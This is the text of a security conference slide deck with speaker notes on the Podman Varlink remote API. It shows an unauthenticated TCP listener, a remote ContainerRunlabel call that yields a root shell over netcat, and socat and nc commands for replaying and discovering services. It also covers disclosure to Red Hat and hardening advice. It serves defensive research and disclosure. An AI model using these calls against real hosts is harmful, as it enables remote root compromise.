• Running podman as root
• You get root
• Running podman as rootless
• You get…. somebody
33. So how about that remote API?
# podman --log-level debug varlink --timeout=0 tcp:0.0.0.0:6000
DEBU[0000] Using varlink socket: tcp:0.0.0.0:6000
DEBU[0000] Initializing boltdb state at
/var/lib/containers/storage/libpod/bolt_state.db
DEBU[0000] Using graph driver overlay
DEBU[0000] Using graph root /var/lib/containers/storage
…..
34. So how about that remote API?
$ varlink call tcp:podman-host:6000/io.podman.ContainerRunlabel
'{"Runlabel": {"image":"docker-registry:5000/image3", "label":"run"}}’
37. So how about that remote API?
(what we see server side)
…..
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]docker-registry:5000/image3:latest"
DEBU[0312] parsed reference into
"[overlay@/var/lib/containers/storage+/var/run/containers/storage:overlay.
mountopt=nodev,metacopy=on]@7276ba03be37ab344f17a.…"
DEBU[0312] exporting opaque data as blob
"sha256:7276ba03be37ab344f17a…."
38. All good ;-]
$ nc podman-host 10000
id
uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:system_r:container_runtime_t:s0-s0:c0.c1023
ls /root
anaconda-ks.cfg
original-ks.cfg
39. Now time for a quick recap
“DO NOT CONFIGURE YOUR PODMAN WITHOUT AUTH”
There is remote-client now (uses SSH) which makes this
easier & may become the standard way of doing things
Reference: https://github.com/containers/libpod/blob/b32cb4b750842212f8002e030db63e92c6485fdc/docs/tutorials/remote_client.md
40. Insecure configs
• Listen as privileged on an open ACL unix socket
• Eg. unix:/run/blah where access isn’t restricted
Local command execution
Reference: https://docs.rs/varlink/8.1.0/varlink/
43. Podman is …. new
• Like 2017ish (?) new
• Similar introduction for Varlink actually
• We really don’t know how or where it will be deployed
• What weird secure or insecure ways admins will want to use it
• But there’s an opportunity to get security right before it takes off
44. And there’s an appetite for remote stuff
Reference: https://github.com/containers/libpod/issues/935
45. Are devs using it like this?
• Gopodman
• Podman Varlink API client in Go
• And it was built for this exact purpose
Reference: https://github.com/praveenkumar/gopodman
49. Are there any docs telling you not to?
• Not that I know of :’)
• Podman project should the explicitly document and make known the risk that
remote API over plain TCP is insecure, especially given the set of APIs
available
• Hopefully this research will make a positive impact
50. What about SSH?
• It does provide advantages over plain Varlink over TCP such as
encrypted connections, built-in auth gateway, etc
• There’s some docs on how to use it… “securely” (?)
Reference: https://podman.io/blogs/2019/01/16/podman-varlink.html
51. Varlink bridge mode
• Bridge + SSH auth > running it over TCP /w no auth
• But not everyone is doing it this way
Reference: https://varlink.org/FAQ.html
52. And Varlink isn’t in the business of auth
Reference: https://varlink.org/FAQ.html
53. Return of Remote API: Trivial API crashes
• Would be remote DoS of podman & some may still work in releases
Reference: https://github.com/containers/libpod/issues?utf8=%E2%9C%93&q=is%3Aissue+api+crash
54. Interesting APIs
• Here’s a few that made the list
• ImportImage(), LoadImage(), RemoveImage(), SearchImages()
• Also some need an “upgraded connection”
• Attach(), SendFile(), ReceiveFile(), etc
• Probably some fun stuff to do there
Reference: https://varlink.org/FAQ.html
57. Even better…
• By appending ‘/’ onto search queries, it parses this to mean we’re
talking to a registry
• And after best effort concatenations….
58. Let’s try some stuff
> dir traversal for arbitrary cert
consumption
> get server to read arbitrary
local files
> internal/external port scan
59. Lots of… other code
• Actually part of the code being executed here is in a different project
• https://github.com/containers/image/blob/master/pkg/tlsclientconfig/tlsclie
ntconfig.go#L20
• https://github.com/containers/libpod/blob/master/pkg/registries/registries.g
o
attack surface++
60. So like various blind file reads, port scan, etc
• Undesired behavior for sure… but more like white elephant bugs
without a full exploit chain
61. More stuff?
• Crash on malformed API call (looks like null ptr deref; fixed in 1.5.1)
62. More stuff?
• Panic due to likely trying to operate on data that isn’t there
• Simple empty or missing ‘name’ parameter, or invalid name, etc…
• Other variants too, kinda hard to not crash the server using this API
65. Testing these issues
$ sudo dnf install -t python3-podman-api
(or python3-varlink works too)
• But doesn’t support every single API that we need
66.
67. “Live”
• We can capture with socat to save the raw API call and then replay it
$ socat TCP-LISTEN:7000 TCP:localhost:6000
{"method":"io.podman.ContainerRunlabel","parameters":{"Runlabel":{"image":
"docker-registry:5000/image3","label":"run"}}}
^^ and then just send it over a regular socket + NULL byte (per spec)
69. Sharing this data with folks
• Took a little time to find the right people to talk to about the bugs
• Now there is a documented security@ email DL for security comms, but I was
recommended to send the details to RedHat directly
• Initial response re: run label API that they believed the was working as it was
designed….
• Yes, but when you Remote API w/o auth it works unintendedly very well for everyone
• Expecting some more bug fixes for the API issues and updated docs
and/or runtime flags to mitigate the risks insecure Remote API setup
• At least once crash already fixed in 1.5.1
70. Discovery
• Look for UNIX sockets you can connect to with Varlink client
$ lsof -U
• Look for loopback or network services that speak the protocol
$ echo -e "{}0" | nc localhost 6000
{"parameters":{"parameter":"method"},"error":"org.varlink.service.InvalidParam
eter"}
73. Hardening
• ACLs
• Choose mode appropriately on registration (the more restrictive the better)
• Choose the more locked down /run directory vs others less so (not /tmp)
• Privileges
• Run services (or even resolver service) as lower privileged users if possible
(instead of root)
• If not rootless, drop privileges when doing serious stuff with APIs
74. Hardening
• Remote access
• Do not run Podman over native Varlink using only TCP
• Use SSH (key + password) related methods to protect the connection and
provide auth so not just anyone can pwn ‘n own
• Understand that even /w remote auth, local users may still be able to hit APIs
• Try to always run rootless to mitigate impact of bugs
75. Conclusion
• Varlink and Podman are still pretty new and need more research
• Security maturity will come with time, hardening efforts and more audits
• Code to test the found issues to be released shortly
• Things can only get better
• For now, if you’re building systems with them, remember to isolate + auth
• More fixes and better security documentation to come
• https://github.com/containers/libpod/commits/master
Reference: https://github.com/containers/libpod/commit/080abfd22228bcc2b254d76aea0636642dd6bccd
Start a server listening on a local socket, loopback or on the network
Like Docker… same CLI, but different design
Written in Go, at least libpod is Go
1.4.4-4.fc30
1.5.1-3.fc30
Sudo make me a sandwich, cool
Could be listening as root, could be any user as long as they have bind perms for that port
So either way, not a small number of target APIs
Now there’s some python libraries to help
Or just command line
Container metadata basically
Even though we’re running commands on the host and not in a container, it’s already started setting up the environment for a container
And since I didn’t mount a fs/volume/etc, it’s probably just dropping us into the host filesystem
Slight difference
Slight difference
Run the server
Issue the call as a remote client
To make sure it’s available locally for Podman to use
Now we’ve pulled down a container image, ran a label and got a root shell all remotely
In case that wasn’t clear already
Some documentation suggests unrestricted access when setting up varlink server instances…
So we can exploit Podman via Gopodman’s documented insecure config
Creates tunnel for stdin/stdout to call methods
It’s a protocol, auth is left to whoever is deploying it… not saying that’s right or wrong
Searching the libpod github for API issues
Haven’t dug into the upgraded connection ones, but there’s probably some interesting stuff there too
If you’re talking to a registry, it also tries to look for certs on the local filesystem
If you import code from somewhere else, it’s now “your code”
Reference: https://github.com/containers/libpod/blob/master/vendor/modules.txt
But there’s definitely a lack of input validation and trusting parameters coming in that allows unintended things like this to happen
/dev/null is not the problem here, some buffer calculation error probably, but unlikely a buffer overflow cause it’s in Go and it’s a panic on some null ptr thing
We can attach to podman with gdb here but… it’s a little awkward and I guess has a learning curve to use on Go compiled code
Uhhh… is it supposed to be removing “similar” names or just exact ones? Also empty volume name removes the first one in alphabetical order?? Might be a functional bug here if nothing else
If you CreateVolumes, I’m pretty sure it doesn’t start making you them in alphabetical order…
Again, this stuff is new
“It’s always a good time to get pickled” – sorry, inside joke
But that’s ok, we’ll do it live
Again this is a shell on the host, not the container, probably due to us not mounting volumes or anything when we’re running the label within the container execution environment
So how do you find varlink services
Check our all the methods a service exposes
This *may* be the first security talk on either on them, and I hope this has been helpful, but I also hope it’s not the last